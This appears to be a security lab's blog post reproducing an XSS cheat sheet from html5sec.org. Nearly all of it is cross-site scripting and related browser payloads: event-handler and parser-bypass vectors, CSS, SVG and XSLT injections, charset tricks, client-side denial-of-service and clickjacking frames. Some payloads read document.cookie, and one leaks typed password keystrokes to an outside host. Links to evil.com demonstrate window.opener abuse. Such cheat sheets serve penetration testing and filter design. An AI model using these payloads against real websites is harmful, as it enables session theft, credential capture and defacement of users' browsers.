XSS Cheat Sheet
- February 19, 2020
- Notes
HTML5 feature vectors
<form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>
<input onfocus=write(1) autofocus>
<input onblur=write(1) autofocus><input autofocus>
<video poster=javascript:alert(1)//></video>
<body onscroll=alert(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
<form id=test onforminput=alert(1)><input></form><button form=test onformchange=alert(2)>X</button>
<video><source onerror="alert(1)">
<video onerror="alert(1)"><source></source></video>
<form><button formaction="javascript:alert(1)">X</button>
<body oninput=alert(1)><input autofocus>
```html
<math href="javascript:alert(1)">CLICKME</math>
<math>
<!-- up to FF 13 -->
<maction actiontype="statusline#http://google.com" xlink:href="javascript:alert(2)">CLICKME</maction>
<!-- FF 14+ -->
<maction actiontype="statusline" xlink:href="javascript:alert(3)">CLICKME<mtext>http://http://google.com</mtext></maction>
</math>
```
```html
<form action="" method="post">
<input name="username" value="admin" />
<input name="password" type="password" value="secret" />
<input name="injected" value="injected" dirname="password" />
<input type="submit">
</form>
```
<link rel="import" href="test.svg" />
<iframe srcdoc="<img src=x:x onerror=alert(1)>" />
```html
<picture><source srcset="x"><img onerror="alert(1)"></picture>
<picture><img srcset="x" onerror="alert(1)"></picture>
<img srcset=",,,,,x" onerror="alert(1)">
```
```html
<a href="//evil.com" target="_blank" rel="noreferrer">CLICK</a> // window.opener will be null
<map><area href="//evil.com" target="_blank" rel="noreferrer">CLICK</area></map> // window.opener will be null
<svg><a xlink:href="//evil.com" rel="noreferrer">CLICK</a></svg> // window.opener still works
<form action="//evil.com" target="_blank" rel="noreferrer"><input type="submit"></form> // window.opener still works
<form id="test" rel="noreferrer"></form><button form="test" formtarget="_blank" formaction="//evil.com">CLICKME</button> // window.opener still works
<math href="//evil.com" xlink:show="new" rel="noreferrer">CLICKME</math> // window.opener still works
```
```html
<iframe srcdoc="<svg onload=alert(1)>⃒"></iframe>
<a href="javascript:'<svg onload=alert(1)>⃒'">CLICK</a>
```
```html
#Chrome, Opera, Safari and Edge
<div onfocus="alert(1)" contenteditable tabindex="0" id="xss"></div>
<div style="-webkit-user-modify:read-write" onfocus="alert(1)" id="xss">
<div style="-webkit-user-modify:read-write-plaintext-only" onfocus="alert(1)" id="xss">
# Firefox
<div onbeforescriptexecute="alert(1)"></div>
<script>1</script>
#MSIE10/11 & Edge
<div style="-ms-scroll-limit:1px;overflow:scroll;width:1px" onscroll="alert(1)">
#MSIE10
<div contenteditable onresize="alert(1)"></div>
# MSIE11
<div onactivate="alert(1)" id="xss" style="overflow:scroll"></div>
<div onfocus="alert(1)" id="xss" style="display:table">
<div id="xss" style="-ms-block-progression:bt" onfocus="alert(1)">
<div id="xss" style="-ms-layout-flow:vertical-ideographic" onfocus="alert(1)">
<div id="xss" style="float:left" onfocus="alert(1)">
# Chrome, Opera, Safari
<style>@keyframes x{}</style>
<div style="animation-name:x" onanimationstart="alert(1)"></div>
# Chrome, Opera, Safari
<style>
div {width: 100px;}
div:target {width: 200px;}
</style>
<div id="xss" onwebkittransitionend="alert(1)" style="-webkit-transition: width .1s;"></div>
# Safari
<div style="overflow:-webkit-marquee" onscroll="alert(1)"></div>
```
<details open ontoggle="alert(1)">
<video src onratechange="alert(1)">
HTML4 and some older vectors
<frameset onload=alert(1)>
<table background="javascript:alert(1)"></table>
<!--<img src="--><img src=x onerror=alert(1)//">
<comment><img src="</comment><img src=x onerror=alert(1)//">
```html
<!-- up to Opera 11.52, FF 3.6.28 -->
<![><img src="]><img src=x onerror=alert(1)//">
<!-- IE9+, FF4+, Opera 11.60+, Safari 4.0.4+, GC7+ -->
<svg><![CDATA[><image xlink:href="]]><img src=xx:x onerror=alert(2)//"></svg>
```
<style><img src="</style><img src=x onerror=alert(1)//">
```html
<li style=list-style:url() onerror=alert(1)></li>
<div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(1)></div>
```
<head><base href="javascript://"/></head><body><a href="/. /,alert(1)//#">XXX</a></body>
<SCRIPT FOR=document EVENT=onreadystatechange>alert(1)</SCRIPT>
<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT>
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
```html
<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></embed>
<embed src="javascript:alert(1)"></embed> // Firefox only
```
<b <script>alert(1)//</script>0</script></b>
```html
<div id="div1"><input value="``onmouseover=alert(1)"></div>
<div id="div2"></div>
<script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>
```
```html
<!-- IE 6-8 -->
<x '="foo"><x foo='><img src=x onerror=alert(1)//'>
<!-- IE 6-9 -->
<! '="foo"><x foo='><img src=x onerror=alert(2)//'>
<? '="foo"><x foo='><img src=x onerror=alert(3)//'>
```
```html
<embed src="javascript:alert(1)"></embed> // O10.10↓, OM10.0↓, GC6↓, FF
<img src="javascript:alert(2)">
<image src="javascript:alert(2)"> // IE6, O10.10↓, OM10.0↓
<script src="javascript:alert(3)"></script> // IE6, O11.01↓, OM10.1↓
```
<div style=width:1px;filter:glow onfilterchange=alert(1)>x</div>
<object allowscriptaccess="always" data="test.swf"></object>
```html
[A]
<? foo="><script>alert(1)</script>">
<! foo="><script>alert(1)</script>">
</ foo="><script>alert(1)</script>">
[B]
<? foo="><x foo='?><script>alert(1)</script>'>">
[C]
<! foo="[[[x]]"><x foo="]foo><script>alert(1)</script>">
[D]
<% foo><x foo="%><script>alert(1)</script>">
```
```html
<html>
<body>
<b>some content without two new line \n\n</b>
Content-Type: multipart/related; boundary="******"<b>some content without two new line</b>
--******
Content-Location: xss.html
Content-Transfer-Encoding: base64

PGlmcmFtZSBuYW1lPWxvIHN0eWxlPWRpc3BsYXk6bm9uZT48L2lmcmFtZT4NCjxzY3JpcHQ+DQp1
cmw9bG9jYXRpb24uaHJlZjtkb2N1bWVudC5nZXRFbGVtZW50c0J5TmFtZSgnbG8nKVswXS5zcmM9
dXJsLnN1YnN0cmluZyg2LHVybC5pbmRleE9mKCcvJywxNSkpO3NldFRpbWVvdXQoImFsZXJ0KGZy
YW1lc1snbG8nXS5kb2N1bWVudC5jb29raWUpIiwyMDAwKTsNCjwvc2NyaXB0PiAgICAg
--******--
</body>
</html>
```
```html
<!-- IE 5-9 -->
<div id=d><x xmlns="><iframe onload=alert(1)"></div>
<script>d.innerHTML+='';</script>
<!-- IE 10 in IE5-9 Standards mode -->
<div id=d><x xmlns='"><iframe onload=alert(2)//'></div>
<script>d.innerHTML+='';</script>
```
<img[a][b]src=x[d]onerror[c]=[e]"alert(1)">
<a href="[a]java[b]script[c]:alert(1)">XXX</a>
<img src="x` `<script>alert(1)</script>"` `>
<img src onerror /" '"= alt=alert(1)//">
<title onpropertychange=alert(1)></title><title title=></title>
```html
<!-- IE 5-8 standards mode -->
<a href=http://foo.bar/#x=`y></a><img alt="`><img src=xx:x onerror=alert(1)></a>">
<!-- IE 5-9 standards mode -->
<!a foo=x=`y><img alt="`><img src=xx:x onerror=alert(2)//">
<?a foo=x=`y><img alt="`><img src=xx:x onerror=alert(3)//">
```
```html
<!--[if]><script>alert(1)</script -->
<!--[if<img src=x onerror=alert(2)//]> -->
```
```html
<script src="/example.comfoo.js"></script> // Safari 5.0, Chrome 9, 10
<script src="\example.comfoo.js"></script> // Safari 5.0
```
```html
<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object>
<object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object>
```
<!-- `<img/src=xx:xx onerror=alert(1)//--!>
```html
<xmp>
<% </xmp>
<img alt='%></xmp><img src=xx:x onerror=alert(1)//'>
<script>
x='<%'
</script> %>/
alert(2)
</script>
XXX
<style>
*['<!--']{}
</style>
-->{}
*{color:red}</style>
```
```html
<frameset onpageshow="alert(1)">
<body onpageshow="alert(1)">
```
<applet onerror="alert(1)"></applet>
CSS-injection-based vectors
<a style="-o-link:'javascript:alert(1)';-o-link-source:current">X</a>
<style>p[foo=bar{}*{-o-link:'javascript:alert(1)'}{}*{-o-link-source:current}*{background:red}]{background:green};</style>
<link rel=stylesheet href=data:,*%7bx:expression(write(1))%7d
<style>@import "data:,*%7bx:expression(write(1))%7D";</style>
<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="alert(1);">XXX</a></a><a href="javascript:alert(2)">XXX</a>
<style>*[{}@import'test.css?]{color: green;}</style>X
<div style="font-family:'foo[a];color:red;';">XXX</div>
<div style="font-family:foo}color=red;">XXX</div>
<div style="[a]color[b]:[c]red">XXX</div>
<div style="63	 6f
 006c 0006F
R: 00072 Ed;color bla:yellow bla;col 0  or:blue;">XXX</div>
<// style=x:expression28write(1)29>
<style>*{x:expression(write(1))}</style>
```html
<!-- Up to Opera 10.63 -->
<div style=content:url(test2.svg)></div>

<!-- Up to Opera 11.64 - see link below -->

<!-- Up to Opera 12.x -->
<div style="background:url(test5.svg)">PRESS ENTER</div>
```
```html
<form xmlns="http://www.w3.org/1999/xhtml" target="_top" action="javascript:alert(1)">
<!-- this file can be crossdomain if "action" attribute refers to an external file -->
<meta http-equiv="refresh" content="1;URL=test5.svg"/>
<input type="submit" autofocus="autofocus"/>
</form>
```
<div style="background:url(http://foo.f/f oo/;color:red/*/foo.jpg);">X</div>
<div style="list-style:url(http://foo.f)20url(javascript:alert(1));">X</div>
```html
XXX<style>
*{color:gre/**/en !/**/important} /* IE 6-9 Standards mode */
<!--
--><!--*{color:red} /* all UA */
*{background:url(xx:x //**/red/*)} /* IE 6-7 Standards mode */
</style>
```
<div style="background:url(/f#[a]oo/;color:red/*/foo.jpg);">X</div>
<div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X</div>
```html
<div id="x">XXX</div>
<style>
#x{font-family:foo[bar;color:green;}
#y];color:red;{}
</style>
```
<x style="background:url('x[a];color:red;/*')">XXX</x>
Pure JavaScript vectors
<script>({set/**/$($){_/**/setter=$,_=1}}).$=alert</script>
<script>({0:#0=alert/#0#/#0#(0)})</script>
<script>ReferenceError.prototype.__defineGetter__('name', function(){alert(1)}),x</script>
<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()</script>
<script>history.pushState(0,0,'/i/am/somewhere_else');</script>
```html
<script>
alert`1`;
var something = `abc${alert(1)}def`;
``.constructor.constructor`alert`1````;
</script>
```
E4X vectors
<script src="#">{alert(1)}</script>;1
+ADw-html+AD4APA-body+AD4APA-div+AD4-top secret+ADw-/div+AD4APA-/body+AD4APA-/html+AD4-.toXMLString().match(/.*/m),alert(RegExp.input);
<b><script<b></b><alert(1)</script </b></b>
<script<{alert(1)}/></script </>
Attack vectors via DOM properties and methods
0?<script>Worker("#").onmessage=function(_)eval(_.data)</script> :postMessage(importScripts('data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk'))
<script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')</script>
JSON-based vectors
<script>[{'a':Object.prototype.__defineSetter__('b',function(){alert(arguments[0])}),'b':['secret']}]</script>
Vectors inside SVG
<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(1)"></g></svg>
```html
<?xml version="1.0" standalone="no"?>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<style type="text/css">
@font-face {font-family: y; src: url("font.svg#x") format("svg");}
body {font: 100px "y";}
</style>
</head>
<body>Hello</body>
</html>
```
```xml
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg onload="alert(1)" xmlns="http://www.w3.org/2000/svg">
<defs><font id="x"><font-face font-family="y"/></font></defs>
</svg>
```
<svg xmlns="http://www.w3.org/2000/svg"><script>alert(1)</script></svg>
<svg onload="javascript:alert(1)" xmlns="http://www.w3.org/2000/svg"></svg>
<svg xmlns="http://www.w3.org/2000/svg"> <a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="javascript:alert(1)"><rect width="1000" height="1000" fill="white"/></a> </svg>
```xml
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<animation xlink:href="javascript:alert(1)"/>
<animation xlink:href="data:text/xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(1)'%3E%3C/svg%3E"/>
<image xlink:href="data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(1)'%3E%3C/svg%3E"/>
<foreignObject xlink:href="javascript:alert(1)"/>
<foreignObject xlink:href="data:text/xml,%3Cscript xmlns='http://www.w3.org/1999/xhtml'%3Ealert(1)%3C/script%3E"/>
</svg>
```
<svg xmlns="http://www.w3.org/2000/svg"> <set attributeName="onmouseover" to="alert(1)"/> <animate attributeName="onunload" to="alert(1)"/> </svg>
<svg xmlns="http://www.w3.org/2000/svg"> <handler xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load">alert(1)</handler> </svg>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <feImage> <set attributeName="xlink:href" to="data:image/svg+xml;charset=utf-8;base64, PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjxzY3JpcHQ%2BYWxlcnQoMSk8L3NjcmlwdD48L3N2Zz4NCg%3D%3D"/> </feImage> </svg>
<svg xmlns="http://www.w3.org/2000/svg" id="foo"> <x xmlns="http://www.w3.org/2001/xml-events" event="load" observer="foo" handler="data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Chandler%20xml%3Aid%3D%22bar%22%20type%3D%22application%2Fecmascript%22%3E alert(1) %3C%2Fhandler%3E%0A%3C%2Fsvg%3E%0A#bar"/> </svg>
<iframe src="data:image/svg-xml,%1F%8B%08%00%00%00%00%00%02%03%B3)N.%CA%2C(Q%A8%C8%CD%C9%2B%B6U%CA())%B0%D2%D7%2F%2F%2F%D7%2B7%D6%CB%2FJ%D77%B4%B4%B4%D4%AF%C8(%C9%CDQ%B2K%CCI-*%D10%D4%B4%D1%87%E8%B2%03"></iframe>
```xml
<svg xmlns="http://www.w3.org/2000/svg">
<a id="x"><rect fill="white" width="1000" height="1000"/></a>
<rect fill="white" style="clip-path:url(test3.svg#a);fill:url(#b);filter:url(#c);marker:url(#d);mask:url(#e);stroke:url(#f);"/>
</svg>
```
```xml
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<clipPath id="a">
<set xlink:href="#x" attributeName="xlink:href" begin="1s" to="javascript:alert(1)" />
</clipPath>
<pattern id="b">
<set xlink:href="#x" attributeName="xlink:href" begin="2s" to="javascript:alert(2)" />
</pattern>
<filter id="c">
<set xlink:href="#x" attributeName="xlink:href" begin="3s" to="javascript:alert(3)" />
</filter>
<marker id="d">
<set xlink:href="#x" attributeName="xlink:href" begin="4s" to="javascript:alert(1)" />
</marker>
<mask id="e">
<set xlink:href="#x" attributeName="xlink:href" begin="5s" to="javascript:alert(2)" />
</mask>
<linearGradient id="f">
<set xlink:href="#x" attributeName="xlink:href" begin="6s" to="javascript:alert(3)" />
</linearGradient>
</svg>
```
```xml
<svg xmlns="http://www.w3.org/2000/svg">
<path d="M0,0" style="marker-start:url(test4.svg#a)"/>
</svg>
```
```xml
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<marker id="a" markerWidth="1000" markerHeight="1000" refX="0" refY="0">
<a xlink:href="http://google.com">
<set attributeName="xlink:href" to="javascript:alert(1)" begin="1s" />
<rect width="1000" height="1000" fill="white"/>
</a>
</marker>
</svg>
```
```xml
<?xml version="1.0"?>
<?xml-stylesheet type="text/xml" href="#stylesheet"?>
<!DOCTYPE doc [
<!ATTLIST xsl:stylesheet id ID #REQUIRED>]>
<svg xmlns="http://www.w3.org/2000/svg">
<xsl:stylesheet id="stylesheet" version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
<iframe xmlns="http://www.w3.org/1999/xhtml" src="javascript:alert(1)"></iframe>
</xsl:template>
</xsl:stylesheet>
<circle fill="red" r="40"></circle>
</svg>
```
<svg xmlns="http://www.w3.org/2000/svg" id="x"> <listener event="load" handler="#y" xmlns="http://www.w3.org/2001/xml-events" observer="x"/> <handler id="y">alert(1)</handler> </svg>
<svg><style><img/src=x onerror=alert(1)// </b>
<svg> <image style='filter:url("data:image/svg+xml,<svg xmlns=%22http://www.w3.org/2000/svg%22><script>parent.alert(1)</script></svg>")'> <!-- Same effect with <image filter='...'> --> </svg>
```html
<!doctype html>
<form>
<label>type a,b,c,d - watch the network tab/traffic (JS is off, latest NoScript)</label>
<br>
<input name="secret" type="password">
</form>
<!-- injection -->
<svg height="50px">
<image xmlns:xlink="http://www.w3.org/1999/xlink">
<set attributeName="xlink:href" begin="accessKey(a)" to="//example.com/?a" />
<set attributeName="xlink:href" begin="accessKey(b)" to="//example.com/?b" />
<set attributeName="xlink:href" begin="accessKey(c)" to="//example.com/?c" />
<set attributeName="xlink:href" begin="accessKey(d)" to="//example.com/?d" />
</image>
</svg>
```
<svg> <a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="?"> <circle r="400"></circle> <animate attributeName="xlink:href" begin="0" from="javascript:alert(1)" to="&" /> </a>
<svg><script> alert`1` <p> <svg><script> alert`1` <p>
X(HT)ML-related vectors
<?xml-stylesheet href="javascript:alert(1)"?><root/>
<script xmlns="http://www.w3.org/1999/xhtml">alert(1)</script>
<!DOCTYPE x[<!ENTITY x SYSTEM "http://html5sec.org/test.xxe">]><y>&x;</y>
<script xmlns="http://www.w3.org/1999/xhtml">alert(1)</script>
<?xml version="1.0"?> <?xml-stylesheet type="text/xsl" href="data:,%3Cxsl:transform version='1.0' xmlns:xsl='http://www.w3.org/1999/XSL/Transform' id='xss'%3E%3Cxsl:output method='html'/%3E%3Cxsl:template match='/'%3E%3Cscript%3Ealert(1)%3C/script%3E%3C/xsl:template%3E%3C/xsl:transform%3E"?> <root/>
```xml
<!DOCTYPE x [
<!ATTLIST img xmlns CDATA "http://www.w3.org/1999/xhtml" src CDATA "xx:x"
onerror CDATA "alert(1)"
onload CDATA "alert(2)">
]><img />
```
<doc xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:html="http://www.w3.org/1999/xhtml"> <html:style /><x xlink:href="javascript:alert(1)" xlink:type="simple">XXX</x> </doc>
<card xmlns="http://www.wapforum.org/2001/wml"><onevent type="ontimer"><go href="javascript:alert(1)"/></onevent><timer value="1"/></card>
<?xml-stylesheet type="text/css"?><!DOCTYPE x SYSTEM "test.dtd"><x>&x;</x>
<!ENTITY x "<html:img src='x' xmlns:html='http://www.w3.org/1999/xhtml' onerror='alert(1)'/>">
<?xml-stylesheet type="text/css"?><root style="x:expression(write(1))"/>
```xml
<?xml-stylesheet type="text/xsl" href="#"?><img xmlns="x-schema:test.xdr"/>
```
```xml
<?xml version="1.0"?>
<Schema name="x" xmlns="urn:schemas-microsoft-com:xml-data">
<ElementType name="img">
<AttributeType name="src" required="yes" default="x"/>
<AttributeType name="onerror" required="yes" default="alert(1)"/>
<attribute type="src"/>
<attribute type="onerror"/>
</ElementType>
</Schema>
```
<x xmlns:xlink="http://www.w3.org/1999/xlink" xlink:actuate="onLoad" xlink:href="javascript:alert(1)" xlink:type="simple"/>
<?xml-stylesheet type="text/css" href="data:,*%7bx:expression(write(2));%7d"?>
<x:template xmlns:x="http://www.wapforum.org/2001/wml" x:ontimer="$(x:unesc)j$(y:escape)a$(z:noecs)v$(x)a$(y)s$(z)cript$x:alert(1)"><x:timer value="1"/></x:template>
<x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="javascript:alert(1)//#x"/>
<x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="test.evt#x"/>
<script xmlns="http://www.w3.org/1999/xhtml" id="x">alert(1)</script>
```xml
<?xml-stylesheet type="text/xsl" href="#" ?>
<stylesheet xmlns="http://www.w3.org/TR/WD-xsl">
<template match="/">
<eval>new ActiveXObject('htmlfile').parentWindow.alert(1)</eval>
<if expr="new ActiveXObject('htmlfile').parentWindow.alert(2)"></if>
</template>
</stylesheet>
```
UTF-7 and other exotic charset vectors
<meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi
<meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>
<meta charset="x-mac-farsi">¼script ¾alert(1)//¼/script ¾
Client-side DoS vectors
<x repeat="template" repeat-start="999999">0<y repeat="template" repeat-start="999999">1</y></x>
<input pattern=^((a+.)a)+$ value=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!>
<input onblur=focus() autofocus><input>
HTML behavior and binding vectors
X<x style=`behavior:url(#default#time2)` onbegin=`write(1)` >
1<set/xmlns=`urn:schemas-microsoft-com:time` style=`behAvior:url(#default#time2)` attributename=`innerhtml` to=`<img/src="x"onerror=alert(1)>`>
1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=<img/src="."onerror=alert(1)>>
```html
1<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=test.vml#xss></vmlframe>
```
```xml
<xml>
<rect style="height:100%;width:100%" id="xss" onmouseover="alert(1)" strokecolor="white" strokeweight="2000px" filled="false" />
</xml>
```
1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>
<a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(1)">XXX</a>
```html
<x style="behavior:url(test.sct)">
```
```html
<SCRIPTLET>
<IMPLEMENTS Type="Behavior"></IMPLEMENTS>
<SCRIPT Language="javascript">alert(1)</SCRIPT>
</SCRIPTLET>
```
```html
<xml id="xss" src="test.htc"></xml>
<label dataformatas="html" datasrc="#xss" datafld="payload"></label>
```
```xml
<?xml version="1.0"?>
<x>
<payload><![CDATA[<img src=x onerror=alert(1)>]]></payload>
</x>
```
```html
<event-source src="event.php" onload="alert(1)">
```
```php
<?php
header("Content-Type: application/x-dom-event-stream");
die("Event: load\ndata: \n\n");
?>
```
<a href="javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A" /></a>
```html
<div id="x">x</div>
<xml:namespace prefix="t">
<import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" targetElement="x" to="<imgsrc=x:xonerror=alert(1)>">
```
Clickjacking and UI redressing vectors
<a href="http://attacker.org"> <iframe src="http://example.org/"></iframe> </a>
```html
<div draggable="true" ondragstart="event.dataTransfer.setData('text/plain','malicious code');">
<h1>Drop me</h1>
</div>
<iframe src="http://www.example.org/dropHere.html"></iframe>
```
```html
<iframe src="view-source:http://www.example.org/" frameborder="0" style="width:400px;height:180px"></iframe>
<textarea type="text" cols="50" rows="10"></textarea>
```
```html
<script>
function makePopups(){
for (i=1;i<6;i++) {
window.open('popup.html','spam'+i,'width=50,height=50');
}
}
</script>
<body>
<a href="#" onclick="makePopups()">Spam</a>
```
```html
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:svg="http://www.w3.org/2000/svg">
<body style="background:gray">
<iframe src="http://example.com/" style="width:800px; height:350px; border:none; mask: url(#maskForClickjacking);"/>
<svg:svg>
<svg:mask id="maskForClickjacking" maskUnits="objectBoundingBox" maskContentUnits="objectBoundingBox">
<svg:rect x="0.0" y="0.0" width="0.373" height="0.3" fill="white"/>
<svg:circle cx="0.45" cy="0.7" r="0.075" fill="white"/>
</svg:mask>
</svg:svg>
</body>
</html>
```
<iframe sandbox="allow-same-origin allow-forms allow-scripts" src="http://example.org/"></iframe>
```html
<span class=foo>Some text</span>
<a class=bar href="http://www.example.org">www.example.org</a>
<script src="http://code.jquery.com/jquery-1.4.4.js"></script>
<script>
$("span.foo").click(function() {
alert('foo');
$("a.bar").click();
});
$("a.bar").click(function() {
alert('bar');
location="http://html5sec.org";
});
</script>
```
```html
<b>drag and drop one of the following strings to the drop box:</b>
<br/><hr/>
jAvascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//
<br/><hr/>
feed:javascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//
<br/><hr/>
feed:data:text/html,<script>alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie)</script><b>
<br/><hr/>
feed:feed:javAscript:javAscript:feed:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//
<br/><hr/>
<div id="dropbox" style="height: 360px;width: 500px;border: 5px solid #000;position: relative;" ondragover="event.preventDefault()">+ Drop Box +</div>
```
Original source: http://www.html5sec.org
Ms08067 Security Lab
Dedicated to spreading cybersecurity knowledge. The team has published "Web Security Attack and Defense: A Practical Guide to Penetration Testing" and "Intranet Security Attack and Defense: A Practical Guide to Penetration Testing", and is currently writing books on Python penetration testing, Java code auditing and binary reverse engineering.
The team's official WeChat account regularly shares hands-on material on CTF ranges, intranet penetration and APT, starting from zero and focused on practical application, aiming to be a genuinely useful knowledge-sharing channel.
Official website: www.ms08067.com